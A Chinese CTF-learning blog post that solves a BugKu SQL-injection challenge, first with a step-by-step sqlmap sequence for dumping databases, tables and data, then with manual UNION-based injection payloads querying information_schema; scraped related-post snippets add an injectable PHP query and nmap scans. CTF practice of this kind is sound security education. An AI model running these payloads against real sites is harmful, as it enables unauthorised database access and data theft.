CTF Web学习(四)----SQL注入

最新推荐文章于 2024-05-12 03:59:22 发布
最新推荐文章于 2024-05-12 03:59:22 发布
阅读量1.5k 收藏 8
点赞数 1
分类专栏: 我的CTF Web学习之路 文章标签: mysql python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36451824/article/details/112465697
版权
本文是CTF Web学习系列的第四篇,主要介绍SQL注入技术,包括使用sqlmap和手工注入方法。通过BugKu Web的几个实例,展示了如何测试注入点、查询数据库信息以及手工注入的基本流程。强调了手工注入的重要性,尤其是在面对真实场景时的灵活性。
摘要由CSDN通过智能技术生成

CTF Web学习(四)

SQL注入

CTF Web学习目录链接
CTF Web学习(一):基础篇及头文件修改、隐藏
CTF Web学习(二):代码审计、burp suite应用
CTF Web学习(三):python脚本的编写及应用
CTF Web学习(四):SQL注入

文章目录

前言

SQL注入还是挺重要的,稍微了解一下的人,你懂的,这里就不在解释,注入的原理百度一下就知道了。而手工注入相比较sqlmap来说可能更为重要,目前主流的数据库,需要稍微了解一下,如:mysql的information_schema、sql server(MSSQL)的sysobjects等,需要用到的时候可以百度看一看。以下还是以bugku的题来测试SQL注入。

一、BugKu Web 成绩单

链接:http://123.206.87.240:8002/chengjidan/
在这里插入图片描述

解法一:sqlmap注入

1、burp suite截包,另存为1.txt,将1.txt放到sqlmap根目录下,方便调用。
在这里插入图片描述
sqlmap的具体用法,小白百度一下,有很多教程,这里就不详细说明了。一下为sqlmap一步步的流程及解释:

1、测试注入点:sqlmap -r 1.txt
2、取数据库名:sqlmap -r 1.txt --dbs
3、取对应数据库中的所有表:sqlmap -r 1.txt -D skctf_flag --tables
4、取对应表中的所有列:sqlmap -r 1.txt -D skctf_flag -T fl4g --columns
5、显示对应表中的数据:sqlmap -r 1.txt -D skctf_flag -T fl4g -C skctf_flag --dump

以上为sqlmap注入的常规操作,sqlmap也可以直接写sql查询语句,当然也可以增删改查。以查询为例:

1、查询所有数据库:sqlmap -r 1.txt --sql-query “select * from information_schema.schemata”
2、查询对应的数据库中的所有表:sqlmap -r 1.txt --sql-query “select * from information_schema.tables where table_schema=‘skctf_flag’”
3、查询表中数据:sqlmap -r 1.txt --sql-query “select * from fl4g”

以上为sqlmap最常用的两种注入获取数据的方法,看个人喜欢使用。我是喜欢用第二种,简单粗暴,在现实中用的比较多,因为第二种可以保持自己对数据库的理解,可引申手工注入,而第一种只是在用sqlmap,看看后面几道题,你就知道sqlmap不是万能的了。手工注入才是王道。

解法二:手工SQL注入

首先说说我对手工SQL注入的一些想法:其实很多刚刚接触SQL注入的萌新来说,对sqlmap情有独钟,认为是万能的,其实这种理解是错误的,因为你还没有在现实生活中真正去尝试过SQL注入,只是停留在网上给出的环境在测试,真正的数据库有很多,CTF题一般是mysql数据库,数据量也很少,你用sqlmap注入,感觉很快,但当你遇到真实的数据库和数据量,会让你崩溃。因此手工SQL注入才是王道,至少反应很快,灵活性很大。现在以此题详细的讲讲手工注入:

1、测试注入点

1、post传值id=1,2,3 发现页面返回值正常
2、测试注入类型,百度一大堆,可以看看。不管什么类型,都要保证返回值正常
在这里插入图片描述

2、判断页面表的列数及替换显示

1、有个技巧是数数页面改变的值有几个,此题是4个值在变,我们从4开始判断,一直加1判断到错误位置,就可以判断出表列为几。id=2' order by 4 #
2、替换数据显示。 id=2' union select 1,2,3,'我想显示的内容' #
在这里插入图片描述
在这里插入图片描述

3、查询当前数据库,或者全部数据库

这里查询所有数据库是为了防止flag在其他的数据库中。id=-2' union select 1,2,database(),group_concat(schema_name) from information_schema.schemata#
在这里插入图片描述

4、查询数据库中的表

id=-2' union select 1,2,database(),group_concat(table_name) from information_schema.tables where table_schema = 'skctf_flag'#
在这里插入图片描述

5、查表中列

id=-2' union select 1,2,database(),group_concat(column_name) from information_schema.columns where table_name = 'fl4g'#

最低0.47元/天 解锁文章
网络猿
关注
专栏目录
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 465
关于SQL注入的相关CTF笔记
二、CTF-Web-SQL注入(记录CTF学习
qq_27920699的博客
12-16 431
个人CTF学习之路
CTFSQL注入(get)
YkingH的博客
07-09 867
CTFWEBSQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 sql注入产生的原因,通常表现在: 不当的类型处理 不安全的数据库配置 不合理的查询集处理 不当的错误处理 转义字符处理不合适 多个提交处理不当 信息探测 扫描主机服务信息及服务版本 nmap -sV 靶机ip地址 快速扫描主机全部信息 nmap
CTF-SQL注入
weixin_44770698的博客
06-16 5196
CTF-SQL注入题目整理
CTF--SQL注入
woshisz0413的博客
11-27 381
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&&与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
CTFer成长之路之CTF中的SQL注入
天行健,君子以自强不息
02-20 1594
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 818
CTFHUB SQL
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 484
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTFWebSQL注入—07—注入点+level 一、题目描述 题目:添加备注 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id,注入类型为以时间为基础的时间盲注。 Step4:爆
CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 3715
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTFWebSQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user=‘=’,pass=‘=’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中提示,提交方法为POST,所以此题为sqlmap的post注入,采用kai
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 438
文章目录前言一、题目描述二、解题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTFWebSQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 二、解题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
CTF-Web SQL注入
weixin_52182264的博客
04-26 4340
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 3071
sql注入
CTF入门之SQL注入
PolarPeak的博客
12-08 2230
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTF-10.sql注入(get)
woo233的博客
09-19 528
SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
CTF-11.SQL注入(post)
woo233的博客
09-20 955
SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数;只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。
CTF-sql注入
am_03的博客
08-23 106
在phpstudy里 #为注释 密码随便输入的 还可以输入admin’#(可注释掉) 注意:有的不让输入特殊字符,因为可以绕过验证 在URL处输入网址,在此工具里打开网页,可以点击右上方的扫描网址或者扫描URL 点击后,弹出的信息右键,点击SQL INJECTION POC, 在上方点击,可以获取它的web环境,数据库,命令执行,文件读取,文件上传等等 在下方点击获取信息可得到更多信息,弹出Version,Server,OS,u...
CTF中的SQL注入
weixin_43906500的博客
02-24 346
1 环境配置 见文章:https://blog.csdn.net/weixin_43906500/article/details/114025507 docker-compose.yml version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 命令执行 docker-compose up -d 2
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(2),2024年最新阿里P7大牛整理
最新发布
2401_84302761的博客
05-12 936
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTF-SQL注入(Get)
su__xiaoyan的博客
12-22 816
SQL注入Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 实验环境 攻击者:Kali Linux(192.168.100.146) 靶机:VMware workstations Pro——Debian 6(32-bit)(192.168.100.132) 注意:当前靶机中并没有flag值,需要通过靶机上面的SQL注入漏洞获取数据库中的内容,登陆网站后台,利用网站
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值